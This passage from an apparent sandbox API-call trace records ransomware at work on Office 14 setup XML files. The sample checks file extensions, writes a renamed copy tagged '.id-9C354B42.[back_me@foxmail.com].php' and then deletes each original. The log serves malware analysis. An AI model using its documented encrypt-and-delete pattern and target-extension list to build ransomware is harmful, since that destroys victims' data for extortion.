Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0041.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.480] lstrlenW (lpString=".doc") returned 4 [0041.480] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.480] lstrlenW (lpString=".docx") returned 5 [0041.480] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.480] lstrlenW (lpString=".pdf") returned 4 [0041.480] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.480] lstrlenW (lpString=".xls") returned 4 [0041.480] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.480] lstrlenW (lpString=".xlsx") returned 5 [0041.480] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.480] lstrlenW (lpString=".ppt") returned 4 [0041.480] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.480] lstrlenW (lpString=".zip") returned 4 [0041.480] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.480] lstrlenW (lpString=".rar") returned 4 [0041.480] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.480] lstrlenW (lpString=".bz2") returned 4 [0041.480] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".7z") returned 3 [0041.481] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString=".dbf") returned 4 [0041.481] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString=".1cd") returned 4 [0041.481] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString=".jpg") returned 4 [0041.481] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString=".doc") returned 4 [0041.481] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".docx") returned 5 [0041.481] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.481] lstrlenW (lpString=".pdf") returned 4 [0041.481] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".xls") returned 4 [0041.481] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".xlsx") returned 5 [0041.481] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.481] lstrlenW (lpString=".ppt") returned 4 [0041.481] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.481] lstrlenW (lpString=".zip") returned 4 [0041.481] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.481] lstrlenW (lpString=".rar") returned 4 [0041.481] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".bz2") returned 4 [0041.481] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.481] lstrlenW (lpString=".7z") returned 3 [0041.481] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.482] lstrlenW (lpString=".dbf") returned 4 [0041.482] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.482] lstrlenW (lpString=".1cd") returned 4 [0041.482] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0041.482] lstrlenW (lpString=".jpg") returned 4 [0041.482] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.482] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.482] lstrlenW (lpString="PowerPointMUI.XML") returned 17 [0041.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.482] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1450) returned 1 [0041.482] CloseHandle (hObject=0x1bc) returned 1 [0041.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20 [0041.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.483] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.483] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.484] GetLastError () returned 0x0 [0041.484] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0041.485] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.492] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.492] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0041.492] SetEndOfFile (hFile=0x1b4) returned 1 [0041.492] CloseHandle (hObject=0x1b4) returned 1 [0041.493] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.493] SetEndOfFile (hFile=0x1bc) returned 1 [0041.494] CloseHandle (hObject=0x1bc) returned 1 [0041.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.494] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0041.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.494] lstrlenW (lpString=".doc") returned 4 [0041.494] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.494] lstrlenW (lpString=".docx") returned 5 [0041.494] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.494] lstrlenW (lpString=".pdf") returned 4 [0041.494] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".xls") returned 4 [0041.495] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".xlsx") returned 5 [0041.495] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.495] lstrlenW (lpString=".ppt") returned 4 [0041.495] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString=".zip") returned 4 [0041.495] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.495] lstrlenW (lpString=".rar") returned 4 [0041.495] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".bz2") returned 4 [0041.495] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".7z") returned 3 [0041.495] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString=".dbf") returned 4 [0041.495] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString=".1cd") returned 4 [0041.495] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString=".jpg") returned 4 [0041.495] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.495] lstrlenW (lpString=".doc") returned 4 [0041.495] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".docx") returned 5 [0041.495] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.495] lstrlenW (lpString=".pdf") returned 4 [0041.495] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.495] lstrlenW (lpString=".xls") returned 4 [0041.496] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString=".xlsx") returned 5 [0041.496] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.496] lstrlenW (lpString=".ppt") returned 4 [0041.496] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.496] lstrlenW (lpString=".zip") returned 4 [0041.496] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.496] lstrlenW (lpString=".rar") returned 4 [0041.496] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString=".bz2") returned 4 [0041.496] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString=".7z") returned 3 [0041.496] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.496] lstrlenW (lpString=".dbf") returned 4 [0041.496] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.496] lstrlenW (lpString=".1cd") returned 4 [0041.496] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.496] lstrlenW (lpString=".jpg") returned 4 [0041.496] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.496] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.496] lstrlenW (lpString="SETUP.XML") returned 9 [0041.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.122] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1886) returned 1 [0042.122] CloseHandle (hObject=0x218) returned 1 [0042.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20 [0042.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.123] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.123] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.123] GetLastError () returned 0x0 [0042.123] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x75e, lpOverlapped=0x0) returned 1 [0042.165] WriteFile (in: hFile=0x21c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x760, lpOverlapped=0x0) returned 1 [0042.166] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.166] WriteFile (in: hFile=0x21c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.166] SetEndOfFile (hFile=0x21c) returned 1 [0042.166] CloseHandle (hObject=0x21c) returned 1 [0042.167] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.167] SetEndOfFile (hFile=0x218) returned 1 [0042.167] CloseHandle (hObject=0x218) returned 1 [0042.168] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.168] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0042.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.168] lstrlenW (lpString=".doc") returned 4 [0042.168] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.168] lstrlenW (lpString=".docx") returned 5 [0042.168] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.168] lstrlenW (lpString=".pdf") returned 4 [0042.168] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.168] lstrlenW (lpString=".xls") returned 4 [0042.168] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.168] lstrlenW (lpString=".xlsx") returned 5 [0042.168] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.168] lstrlenW (lpString=".ppt") returned 4 [0042.169] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString=".zip") returned 4 [0042.169] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.169] lstrlenW (lpString=".rar") returned 4 [0042.169] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString=".bz2") returned 4 [0042.169] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString=".7z") returned 3 [0042.169] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString=".dbf") returned 4 [0042.169] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString=".1cd") returned 4 [0042.169] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString=".jpg") returned 4 [0042.169] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.169] lstrlenW (lpString=".doc") returned 4 [0042.169] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString=".docx") returned 5 [0042.169] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.169] lstrlenW (lpString=".pdf") returned 4 [0042.169] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString=".xls") returned 4 [0042.169] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.169] lstrlenW (lpString=".xlsx") returned 5 [0042.169] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.170] lstrlenW (lpString=".ppt") returned 4 [0042.170] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.170] lstrlenW (lpString=".zip") returned 4 [0042.170] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.170] lstrlenW (lpString=".rar") returned 4 [0042.170] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.170] lstrlenW (lpString=".bz2") returned 4 [0042.170] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.170] lstrlenW (lpString=".7z") returned 3 [0042.170] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.170] lstrlenW (lpString=".dbf") returned 4 [0042.170] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.170] lstrlenW (lpString=".1cd") returned 4 [0042.170] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0042.170] lstrlenW (lpString=".jpg") returned 4 [0042.170] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.170] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.170] lstrlenW (lpString="Proofing.XML") returned 12 [0042.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.196] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=811) returned 1 [0042.196] CloseHandle (hObject=0x218) returned 1 [0042.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20 [0042.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.197] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.197] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.197] GetLastError () returned 0x0 [0042.197] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x32b, lpOverlapped=0x0) returned 1 [0042.199] 